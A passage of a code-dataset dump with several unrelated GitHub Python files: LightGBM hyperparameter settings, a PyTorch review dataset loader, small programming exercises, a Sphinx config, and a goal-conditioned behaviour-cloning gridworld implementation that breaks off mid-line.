限制类别特征数量\n 'min_data_in_leaf':30, # 叶子最小样本\n 'feature_fraction':0.7, # 训练特征比例\n 'bagging_fraction':0.8, # 训练样本比例 \n 'num_threads':8,\n 'min_data_in_bin':30, # 单箱数据量\n 'max_bin':256, # 最大分箱数 # 超参\n 'is_unbalance':True, # 非平衡样本\n 'metric':'auc',\n 'train_metric':True,\n 'verbose':-1,\n}\n\n# 超参域\nspaceParam = {\n 'boosting': hp.choice('boosting',['gbdt','dart']),\n 'learning_rate': hp.loguniform('learning_rate', np.log(0.01), np.log(0.05)),\n 'max_bin':hp.quniform('max_bin',100,300,20), # max_bin\n 'num_leaves': hp.quniform('num_leaves', 3, 63, 3), # 较小的num_leaves\n 'feature_fraction': hp.uniform('feature_fraction', 0.7,1), # 较小的\n 'min_data_in_leaf': hp.quniform('min_data_in_leaf', 10, 50,5), # 较大的\n 'num_boost_round':hp.quniform('num_boost_round',500,2000,100), # 迭代次数\n 'bagging_fraction':hp.uniform('bagging_fraction',0.6,1) # 较小的\n}\n","repo_name":"huangxianyang/lgb-lr-score","sub_path":"lgbParam.py","file_name":"lgbParam.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"10166615864","text":"from argparse import Namespace\nfrom collections import Counter\nimport json\nimport os\nimport re\nimport string\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom tqdm import tqdm_notebook\nimport initialization\n\nargs = initialization.utils(frequency_cutoff=25, \n model_state_file='model.pth', \n review_csv='../data/reviews.csv', \n save_dir='../model/',\n vectorizer_file='vectorizer.json', \n batch_size=128, \n early_stopping_criteria=5,\n learning_rate=0.001, \n num_epochs=100, \n seed=1110, \n catch_keyboard_interrupt=True,\n expand_filepaths_to_save_dir=True,\n reload_from_files=False)\n\nclass ReviewDataset(Dataset):\n def __init__(self, review_df, vectorizer):\n \"\"\"\n Args:\n review_df (pandas.DataFrame): the dataset\n vectorizer (ReviewVectorizer): vectorizer instantiated from dataset\n \"\"\"\n self.review_df = review_df\n self._vectorizer = vectorizer\n\n self.train_df = self.review_df[self.review_df.split=='train']\n self.train_size = len(self.train_df)\n\n self.val_df = self.review_df[self.review_df.split=='val']\n self.validation_size = len(self.val_df)\n\n self.test_df = self.review_df[self.review_df.split=='test']\n self.test_size = len(self.test_df)\n\n self._lookup_dict = {'train': (self.train_df, self.train_size),\n 'val': (self.val_df, self.validation_size),\n 'test': (self.test_df, self.test_size)}\n\n self.set_split('train')\n\n @classmethod\n def load_dataset_and_make_vectorizer(cls, review_csv):\n \"\"\"Load dataset and make a new vectorizer from scratch\n \n Args:\n review_csv (str): location of the dataset\n Returns:\n an instance of ReviewDataset\n \"\"\"\n review_df = pd.read_csv(review_csv)\n train_review_df = review_df[review_df.split=='train']\n return cls(review_df, ReviewVectorizer.from_dataframe(train_review_df))\n \n @classmethod\n def load_dataset_and_load_vectorizer(cls, review_csv, vectorizer_filepath):\n \"\"\"Load dataset and the corresponding vectorizer. \n Used in the case in the vectorizer has been cached for re-use\n \n Args:\n review_csv (str): location of the dataset\n vectorizer_filepath (str): location of the saved vectorizer\n Returns:\n an instance of ReviewDataset\n \"\"\"\n review_df = pd.read_csv(review_csv)\n vectorizer = cls.load_vectorizer_only(vectorizer_filepath)\n return cls(review_df, vectorizer)\n\n @staticmethod\n def load_vectorizer_only(vectorizer_filepath):\n \"\"\"a static method for loading the vectorizer from file\n \n Args:\n vectorizer_filepath (str): the location of the serialized vectorizer\n Returns:\n an instance of ReviewVectorizer\n \"\"\"\n with open(vectorizer_filepath) as fp:\n return ReviewVectorizer.from_serializable(json.load(fp))\n\n def save_vectorizer(self, vectorizer_filepath):\n \"\"\"saves the vectorizer to disk using json\n \n Args:\n vectorizer_filepath (str): the location to save the vectorizer\n \"\"\"\n with open(vectorizer_filepath, \"w\") as fp:\n json.dump(self._vectorizer.to_serializable(), fp)\n\n def get_vectorizer(self):\n \"\"\" returns the vectorizer \"\"\"\n return self._vectorizer\n\n def set_split(self, split=\"train\"):\n \"\"\" selects the splits in the dataset using a column in the dataframe \n \n Args:\n split (str): one of \"train\", \"val\", or \"test\"\n \"\"\"\n self._target_split = split\n self._target_df, self._target_size = self._lookup_dict[split]\n\n def __len__(self):\n return self._target_size\n\n def __getitem__(self, index):\n \"\"\"the primary entry point method for PyTorch datasets\n \n Args:\n index (int): the index to the data point \n Returns:\n a dictionary holding the data point's features (x_data) and label (y_target)\n \"\"\"\n row = self._target_df.iloc[index]\n\n review_vector = \\\n self._vectorizer.vectorize(row.review)\n\n rating_index = \\\n self._vectorizer.rating_vocab.lookup_token(row.rating)\n\n return {'x_data': review_vector,\n 'y_target': rating_index}\n\n def get_num_batches(self, batch_size):\n \"\"\"Given a batch size, return the number of batches in the dataset\n \n Args:\n batch_size (int)\n Returns:\n number of batches in the dataset\n \"\"\"\n return len(self) // batch_size \n \ndef generate_batches(dataset, batch_size, shuffle=True,\n drop_last=True, device=\"cpu\"):\n \"\"\"\n A generator function which wraps the PyTorch DataLoader. It will \n ensure each tensor is on the write device location.\n \"\"\"\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size,\n shuffle=shuffle, drop_last=drop_last)\n\n for data_dict in dataloader:\n out_data_dict = {}\n for name, tensor in data_dict.items():\n out_data_dict[name] = data_dict[name].to(device)\n yield out_data_dict\n","repo_name":"dmgolembiowski/AI-news","sub_path":"learning/vectorization/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"4658192740","text":"#wapp to check armstrong no \nn = int(input('Enter a no : '))\nn1 = n\nrev = 0\nwhile n>0:\n rem = n%10\n rev = rev+rem*rem*rem\n n = n//10\nif rev == n1:\n print('No. is armstrong')\nelse:\n print('No. is not armstrong')","repo_name":"siddesh1672003/python","sub_path":"rev1.py","file_name":"rev1.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22205597885","text":"# https://leetcode.com/discuss/interview-question/1061028/Indeed-or-Phone-Screen-(\n# Karat)-or-Parent-Child-Graph-and-Calculator Same aim as Q1 above, but this time the expression includes nested\n# expressions, e.g. \"12 + 2 + ((4 - 19) - 1)\" containing ( and ) brackets only. Evaluate and return the answer to\n# this expression. Input: \"12 - (1 - 2)\" Output: 13\n\ndef calculate(s):\n s = s.strip()\n if s[0] == \"-\":\n s = \"0\" + s\n operands = []\n operators = []\n temp_operands = []\n temp_operators = []\n temp = \"\"\n for index, char in enumerate(s):\n if char not in (\"(\", \")\", \"+\", \"-\", \" \"):\n temp += char\n elif char in (\"(\", \"+\", \"-\"):\n if char == \"-\" and s[index - 1] == \"(\":\n operands.append(0)\n if temp != \"\":\n operands.append(int(temp))\n temp = \"\"\n operators.append(char)\n elif char == \")\":\n if temp != \"\":\n operands.append(int(temp))\n temp = \"\"\n while operands and operators and operators[-1] != \"(\":\n temp_operands.append(operands.pop())\n temp_operators.append(operators.pop())\n operators.pop()\n temp_operands.append(operands.pop())\n result = evaluate_expression(temp_operands, temp_operators)\n operands.append(result)\n temp_operands = []\n temp_operators = []\n if temp != \"\":\n operands.append(int(temp))\n while operators:\n operand1 = operands.pop(0)\n operand2 = operands.pop(0)\n operator = operators.pop(0)\n result = evaluate(operand1, operand2, operator)\n operands.insert(0, result)\n return operands[0]\n\n\ndef evaluate_expression(operands, operators):\n while operators:\n operand1 = operands.pop()\n operand2 = operands.pop()\n operator = operators.pop()\n result = evaluate(operand1, operand2, operator)\n operands.append(result)\n return operands[0]\n\n\ndef evaluate(operand1, operand2, operator):\n if operator == \"+\":\n return operand1 + operand2\n else:\n return operand1 - operand2\n\n\nprint(calculate(\"12 + 2 + ((4 - 19) - 1)\"))\nprint(calculate(\"12 - (1 - 2)\"))\n\n\nexpression2_1 = \"5+16-((9-6)-(4-2))+1\"\nexpression2_2 = \"22+(2-4)\"\nexpression2_3 = \"6+9-12\"\nexpression2_4 = \"((1024))\"\nexpression2_5 = \"1+(2+3)-(4-5)+6\"\nexpression2_6 = \"255\"\n\n\nprint(calculate(expression2_1))\nprint(calculate(expression2_2))\nprint(calculate(expression2_3))\nprint(calculate(expression2_4))\nprint(calculate(expression2_5))\nprint(calculate(expression2_6))\n","repo_name":"dheerajthodupunoori/problem-solving","sub_path":"indeed-karat/basic_calculator.py","file_name":"basic_calculator.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42624088613","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# http://www.sphinx-doc.org/en/master/config\n\n# The docs templates, css and js all comes from discord.py (https://github.com/Rapptz/discord.py)\n# Thanks to Rapptz (Danny) for this amazing theme and scripts.\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\n\nimport shinkei\n\n# import sys\n# sys.path.insert(0, os.path.abspath(\".\"))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = \"shinkei\"\n# noinspection PyShadowingBuiltins\ncopyright = \"2019, Lorenzo\"\nauthor = \"Lorenzo\"\n\n# The short X.Y version\nversion = shinkei.__version__\n# The full version, including alpha/beta/rc tags\nrelease = version\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named \"sphinx.ext.*\") or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.intersphinx\",\n \"sphinxcontrib_trio\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = [\".rst\", \".md\"]\nsource_suffix = \".rst\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = None\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\"]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"friendly\"\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_experimental_html5_writer = True\nhtml_theme = \"basic\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# better scorer\nhtml_search_scorer = \"_static/scorer.js\"\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"shinkeidoc\"\n\nhtml_context = {\n 'ON_READTHEDOCS': bool(os.environ.get('READTHEDOCS'))\n}\n\n# -- Extension configuration -------------------------------------------------\n\n# -- Options for intersphinx extension ---------------------------------------\n\nintersphinx_mapping = {\n \"python\": (\"https://docs.python.org/3\", None),\n \"aiohttp\": (\"https://aiohttp.readthedocs.io/en/stable/\", None),\n \"discord.py\": (\"https://discordpy.readthedocs.io/en/latest/\", None)\n}\n\nautodoc_member_order = \"bysource\"\n\n\ndef setup(app):\n app.add_javascript(\"custom.js\")\n","repo_name":"PendragonLore/shinkei","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"49329497","text":"\n# create a class Persona with atributes nombre, apellido, dni\nclass Persona:\n\n def __init__(self, nombre, apellido, dni):\n self.nombre = nombre\n self.apellido = apellido\n self.dni = dni\n\n def __str__(self):\n return self.nombre + \" \" + self.apellido + \" \" + self.dni\n\n# create a class Alumno that inherits from Persona with atriutes nombre, apellido, dni, matricula, email, curso, promedio\nclass Alumno(Persona):\n\n def __init__(self, nombre, apellido, dni, matricula, email, curso, promedio):\n super().__init__(nombre, apellido, dni)\n self.matricula = matricula\n self.email = email\n self.curso = curso\n self.promedio = promedio\n\n def __str__(self):\n return super().__str__() + \" \" + self.matricula + \" \" + self.email + \" \" + self.curso + \" \" + self.promedio\n\nclass Lista:\n\n alumnos: list[object] = []\n\n @staticmethod\n def agregar_alumno(alumno: object):\n Lista.alumnos.append(alumno)\n\n # return the best promedio of one course\n @staticmethod\n def mejor_promedio(curso: str):\n promedio_max = 0\n for alumno in Lista.alumnos:\n if alumno.curso == curso:\n if alumno.promedio > promedio_max:\n promedio_max = alumno.promedio\n return promedio_max\n\n\n\ndef main():\n # create a list of Alumno objects\n alumno1 = Alumno(\"Juan\", \"Perez\", \"12345678\", \"1234\", \"alumno1@gmail.com\", \"1A\", 8.5)\n alumno2 = Alumno(\"Maria\", \"Gomez\", \"87654321\", \"5678\", \"alumno2@gmail.com\", \"2B\", 7.5)\n alumno3 = Alumno(\"Pedro\", \"Lopez\", \"13579246\", \"9101\", \"alumno3@gmail.com\", \"3C\", 9.0)\n alumno4 = Alumno(\"Ana\", \"Martinez\", \"24681013\", \"1112\", \"alumno4@gmail.com\", \"1A\", 8.0)\n alumno5 = Alumno(\"Jose\", \"Gonzalez\", \"31415926\", \"1314\", \"alumno5@gmail.com\", \"1A\", 7.0)\n\n # add the Alumno objects to the list\n Lista.agregar_alumno(alumno1)\n Lista.agregar_alumno(alumno2)\n Lista.agregar_alumno(alumno3)\n Lista.agregar_alumno(alumno4)\n Lista.agregar_alumno(alumno5)\n\n print(Lista.mejor_promedio(\"1A\"))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Lucas16AR/UM-Diseno-De-Sistemas-2022","sub_path":"Parcial/Recuperatorio/Recuperatorio Lucas Galdame Villegas/ejercicio1.2.py","file_name":"ejercicio1.2.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37981428449","text":"class Solution(object):\n def isHappy(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n # squaresum = False\n st=set()\n while(n !=1):\n n = self.square_number(n)\n if n in st:\n return False\n st.add(n) \n if n == 1:\n return True\n \n\n def square_number(self,num):\n squaresum = 0\n while(num):\n squaresum += pow(num%10,2)\n num = (num//10)\n \n return squaresum\n\n \n# Input: n = 19\n# Output: true\n# Explanation:\n# 12 + 92 = 82\n# 82 + 22 = 68\n# 62 + 82 = 100\n# 12 + 02 + 02 = 1\n\"\"\"\nA happy number is a number defined by the following process:\nStarting with any positive integer, replace the number by the sum of the squares of its digits.\nRepeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1.\nThose numbers for which this process ends in 1 are happy.\n\n slow = self.square_number(n)\n fast = self.square_number(self.square_number(n))\n\n while slow!=fast and fast!=1:\n # print(slow,fast)\n slow = self.square_number(slow)\n fast = self.square_number(self.square_number(fast))\n \n return fast==1\n\"\"\"\n","repo_name":"aviTak/dsa-interview-prep","sub_path":"LeetCode 75/Python LeetCode 75/202Happy Number.py","file_name":"202Happy Number.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"45509059884","text":"from collections import OrderedDict, deque\nfrom typing import Tuple \nimport gym\nfrom gym import spaces\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom queue import Queue\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n# Import make_model here from the approptiate model_*.py file\nfrom model_pytorch import make_model\n# This model should be the same as problem 2\n\nclass GCDataset(torch.utils.data.Dataset):\n\tdef __init__(self, train_states, train_actions) -> None:\n\t\tsuper().__init__()\n\t\tself.train_states = train_states\n\t\tself.train_actions = train_actions\n\n\tdef __len__(self):\n\t\treturn len(self.train_states)\n\t\n\tdef __getitem__(self, idx):\n\n\t\tinput = torch.tensor(self.train_states[idx]).float()\n\t\tout = torch.tensor(self.train_actions[idx]).long()\n\t\treturn {\n\t\t\t'input': input,\n\t\t\t'output': out\n\t\t}\n\n\n### 2.1 Build Goal-Conditioned Task\nclass FourRooms:\n\tdef __init__(self, l=5, T=30):\n\t\t'''\n\t\tFourRooms Environment for pedagogic purposes\n\t\tEach room is a l*l square gridworld, \n\t\tconnected by four narrow corridors,\n\t\tthe center is at (l+1, l+1).\n\t\tThere are two kinds of walls:\n\t\t- borders: x = 0 and 2*l+2 and y = 0 and 2*l+2 \n\t\t- central walls\n\t\tT: maximum horizion of one episode\n\t\t\tshould be larger than O(4*l)\n\t\t'''\n\t\tassert l % 2 == 1 and l >= 5\n\t\tself.l = l\n\t\tself.total_l = 2 * l + 3\n\t\tself.T = T\n\n\t\t# create a map: zeros (walls) and ones (valid grids)\n\t\tself.map = np.ones((self.total_l, self.total_l), dtype=np.bool)\n\t\t# build walls\n\t\tself.map[0, :] = self.map[-1, :] = self.map[:, 0] = self.map[:, -1] = False\n\t\tself.map[l+1, [1,2,-3,-2]] = self.map[[1,2,-3,-2], l+1] = False\n\t\tself.map[l+1, l+1] = False\n\n\t\t# define action mapping (go right/up/left/down, counter-clockwise)\n\t\t# e.g [1, 0] means + 1 in x coordinate, no change in y coordinate hence\n\t\t# hence resulting in moving right\n\t\tself.act_set = np.array([\n\t\t\t[1, 0], [0, 1], [-1, 0], [0, -1] \n\t\t], dtype=np.int)\n\t\tself.action_space = spaces.Discrete(4)\n\n\t\t# you may use self.act_map in search algorithm \n\t\tself.act_map = {}\n\t\tself.act_map[(1, 0)] = 0\n\t\tself.act_map[(0, 1)] = 1\n\t\tself.act_map[(-1, 0)] = 2\n\t\tself.act_map[(0, -1)] = 3\n\n\tdef render_map(self):\n\t\tplt.imshow(self.map)\n\t\tplt.xlabel('y')\n\t\tplt.ylabel('x')\n\t\tplt.savefig('p2_map.png', \n\t\t\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\t\tplt.show()\n\t\n\tdef sample_sg(self) -> Tuple[np.array, np.array]:\n\t\t# sample s\n\t\twhile True:\n\t\t\ts = [np.random.randint(self.total_l), \n\t\t\t\tnp.random.randint(self.total_l)]\n\t\t\tif self.map[s[0], s[1]]:\n\t\t\t\tbreak\n\n\t\t# sample g\n\t\twhile True:\n\t\t\tg = [np.random.randint(self.total_l), \n\t\t\t\tnp.random.randint(self.total_l)]\n\t\t\tif self.map[g[0], g[1]] and \\\n\t\t\t\t(s[0] != g[0] or s[1] != g[1]):\n\t\t\t\tbreak\n\t\treturn s, g\n\n\tdef reset(self, s=None, g=None):\n\t\t'''\n\t\tArgs:\n\t\t\ts: starting position, np.array((2,))\n\t\t\tg: goal, np.array((2,))\n\t\tReturn:\n\t\t\tobs: np.cat(s, g)\n\t\t'''\n\t\tif s is None or g is None:\n\t\t\ts, g = self.sample_sg()\n\t\telse:\n\t\t\tassert 0 < s[0] < self.total_l - 1 and 0 < s[1] < self.total_l - 1\n\t\t\tassert 0 < g[0] < self.total_l - 1 and 0 < g[1] < self.total_l - 1\n\t\t\tassert (s[0] != g[0] or s[1] != g[1])\n\t\t\tassert self.map[s[0], s[1]] and self.map[g[0], g[1]]\n\t\t\n\t\tself.s = s\n\t\tself.g = g\n\t\tself.t = 1\n\n\t\treturn self._obs()\n\t\n\tdef step(self, a):\n\t\t'''\n\t\tArgs:\n\t\t\ta: action, index into act_set\n\t\tReturn obs, reward, done, info:\n\t\t\tdone: whether the state has reached the goal\n\t\t\tinfo: succ if the state has reached the goal, fail otherwise \n\t\t'''\n\t\tassert self.action_space.contains(a)\n\n\t\t# WRITE CODE HERE\n\t\treached_goal = np.allclose(self.s, self.g)\n\t\talready_done = reached_goal or self.t >= self.T\n\t\tif already_done:\n\t\t\tprint(\"[warning] already done, cannot step\")\n\t\t\treturn self._obs(), 1 if reached_goal else 0, True, reached_goal\n\n\t\tif self.map[self.s[0], self.s[1]] == 0:\n\t\t\t# \"step into a wall?!\"\n\t\t\t# self.s = self.s\n\t\t\tpass\n\t\telse:\n\t\t\tself.s = self.s + self.act_set[a]\n\t\treward = 0.0 if reached_goal else 1\n\t\treached_goal = np.allclose(self.s, self.g)\n\t\tdone = False\n\t\tself.t += 1\n\t\tdone = reached_goal or self.t >= self.T\n\t\t# END\n\t\t\n\t\treturn self._obs(), reward, done, reached_goal\n\n\tdef _obs(self):\n\t\treturn np.concatenate([self.s, self.g])\n\n\ndef plot_traj(env, ax, traj, goal=None):\n\ttraj_map = env.map.copy().astype(np.float)\n\ttraj_map[traj[:, 0], traj[:, 1]] = 2 # visited states\n\ttraj_map[traj[0, 0], traj[0, 1]] = 1.5 # starting state\n\ttraj_map[traj[-1, 0], traj[-1, 1]] = 2.5 # ending state\n\tif goal is not None:\n\t\ttraj_map[goal[0], goal[1]] = 3 # goal\n\tax.imshow(traj_map)\n\tax.set_xlabel('y')\n\tax.set_label('x')\n\n### A uniformly random policy's trajectory\ndef test_step(env: FourRooms):\n\ts_g = np.array([1, 1])\n\tg = np.array([2*l+1, 2*l+1])\n\ts_g = env.reset(s_g, g)\n\tdone = False\n\ttraj = [s_g]\n\twhile not done:\n\t\ts_g, _, done, _ = env.step(env.action_space.sample())\n\t\ttraj.append(s_g)\n\ttraj = np.array(traj)\n\n\tax = plt.subplot()\n\tplot_traj(env, ax, traj, g)\n\tplt.savefig('p2_random_traj.png', \n\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\tplt.show()\n\n\ndef compute_shortest_path(env: FourRooms, start=None, goal=None):\n\tshortest_traj = None\n\tshortest_action = None\n\tvisited = np.zeros(env.map.shape, dtype=bool)\n\tif start is None or goal is None:\n\t\tstart, goal = env.s, env.g\n\t_map = env.map\n\t_act_set = env.act_set\n\t# act_map = env.act_map\n\n\tdone = False\n\tbfs_queue = deque()\n\tbfs_queue.append(([start], []))\n\twhile len(bfs_queue) > 0:\n\t\tstates, actions = bfs_queue.popleft()\n\t\tcur_s = states[-1]\n\t\tif np.allclose(cur_s, goal):\n\t\t\tdone = True\n\t\t\tshortest_traj = states\n\t\t\tshortest_action = actions\n\t\t\tbreak\n\t\tfor a in range(4):\n\t\t\ts_next = cur_s + _act_set[a]\n\t\t\tif _map[s_next[0], s_next[1]] and not visited[s_next[0], s_next[1]]:\n\t\t\t\tbfs_queue.append((states + [s_next], actions + [a]))\n\t\t\t\tvisited[s_next[0], s_next[1]] = True\n\t# in four rooms, there is always a path; if not, check env.T setting.\n\tassert done, \"goal not reached\"\n\treturn np.array(shortest_traj, dtype=int), np.array(shortest_action, dtype=int)\n\ndef shortest_path_expert(env: FourRooms, render=False):\n\t\"\"\" \n\tImplement a shortest path algorithm and collect N trajectories for N goal reaching tasks\n\t\"\"\"\n\tN = 1000\n\texpert_trajs = []\n\texpert_actions = []\n\n\t# WRITE CODE HERE\n\tfor i in range(N):\n\t\tenv.reset()\n\t\ttraj, actions = compute_shortest_path(env)\n\t\texpert_trajs.append(traj)\n\t\texpert_actions.append(actions)\n\t# END\n\t# You should obtain expert_trajs, expert_actions from search algorithm\n\n\tfig, axes = plt.subplots(5,5, figsize=(10,10))\n\taxes = axes.reshape(-1)\n\tfor idx, ax in enumerate(axes):\n\t\tplot_traj(env, ax, expert_trajs[idx])\n\t\n\t# Plot a subset of expert state trajectories\n\tplt.savefig('p2_expert_trajs.png', \n\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\tif render:\n\t\tplt.show()\n\treturn expert_trajs, expert_actions\n\n\nclass GCBC:\n\n\tdef __init__(self, env, expert_trajs, expert_actions, expert_original_goals=None, num_workers=1):\n\t\tself.env = env\n\t\tself.expert_trajs = expert_trajs\n\t\tself.expert_actions = expert_actions\n\t\tself.expert_original_goals = expert_original_goals\n\n\t\tself.transition_num = sum(map(len, expert_actions))\n\t\tself.model = make_model(input_dim=4, output_dim=4)\n\t\t# state_dim + goal_dim = 4\n\t\t# action_choices = 4\n\t\tself.model_optimizer = torch.optim.Adam(self.model.parameters(), lr=1e-3)\n\t\tself.num_workers = num_workers\n\t\n\tdef generate_behavior_cloning_data(self):\n\t\t# training state should be a concatenation of state and goal\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions in zip(self.expert_trajs, self.expert_actions):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tself._train_states.append(np.concatenate([traj[idx], traj[-1]]))\n\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\tdef generate_relabel_data(self, relabel_one_future=True):\n\t\t# apply expert data goal relabelling trick\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions in zip(self.expert_trajs, self.expert_actions):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tif relabel_one_future:\n\t\t\t\t\tchosen_idx = np.random.choice(np.arange(idx + 1, len(traj)))\n\t\t\t\t\trelabeled_goal = traj[chosen_idx]\n\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\telse: \n\t\t\t\t\tfor relabeled_goal in traj[idx+1:]:\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, 4)\n\n\t# def train_epoch(self):\n\t# \tout = self.model(self._train_states)\n\n\tdef generate_random_policy_vanilla_data(self):\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions, goals in zip(self.expert_trajs, self.expert_actions, self.expert_original_goals):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tgoal = goals[idx]\n\t\t\t\tself._train_states.append(np.concatenate([traj[idx], goal]))\n\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\tdef generate_random_policy_relabel_data(self, relabel_one_future=True):\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions, goals in zip(self.expert_trajs, self.expert_actions, self.expert_original_goals):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tif not relabel_one_future:\n\t\t\t\t\t# state not reached case, add \"far away\" goal intentionally\n\t\t\t\t\tif not np.allclose(traj[-1], goals[idx]):\n\t\t\t\t\t\tgoal = goals[idx]\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\t\t\n\t\t\t\t\tfor relabeled_goal in traj[idx+1:]:\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\telse:\n\t\t\t\t\tchosen_idx = np.random.choice(np.arange(idx + 1, len(traj)))\n\t\t\t\t\trelabeled_goal = traj[chosen_idx]\n\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\tself._train_actions.append(actions[idx])\n\n\t\t# END\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\n\tdef train(self, dataloader, num_epochs=20, batch_size=256):\n\t\t\"\"\" \n\t\tTrains the model on training data generated by the expert policy.\n\t\tArgs:\n\t\t\tnum_epochs: number of epochs to train on the data generated by the expert.\n\t\t\tbatch_size\n\t\tReturn:\n\t\t\tloss: (float) final loss of the trained policy.\n\t\t\tacc: (float) final accuracy of the trained policy\n\t\t\"\"\"\n\t\t# WRITE CODE HERE\n\t\t# END\n\t\tfor epoch in range(num_epochs):\n\t\t\tepoch_loss = 0\n\t\t\tepoch_acc = 0\n\t\t\tself.model_optimizer.zero_grad()\n\t\t\t# TODO The reason I used dataloader is that I am comfortable with it and it supports useful features including multiprocess for preparing large batches of data while GPUs are busy with training. Somehow it becomes a bottleneck in our hw3. Anyway the problem is solved and I will just use a forloop. Please let me know if you have any clue regarding why this dataloader related issue happens. For now I guess it is due to slicing vs. loop get difference from memory.\n\t\t\t# for i, data in enumerate(dataloader):\n\t\t\tfor i in range(0, len(self._train_actions), batch_size):\n\t\t\t\t# states, actions = data[\"input\"], data[\"output\"]\n\t\t\t\tstates = torch.tensor(self._train_states[i:i+batch_size]).float()\n\t\t\t\tactions = torch.tensor(self._train_actions[i:i+batch_size]).long()\n\t\t\t\tout = self.model(states)\n\t\t\t\tloss = F.cross_entropy(out, actions)\n\t\t\t\tacc = (out.argmax(dim=1) == 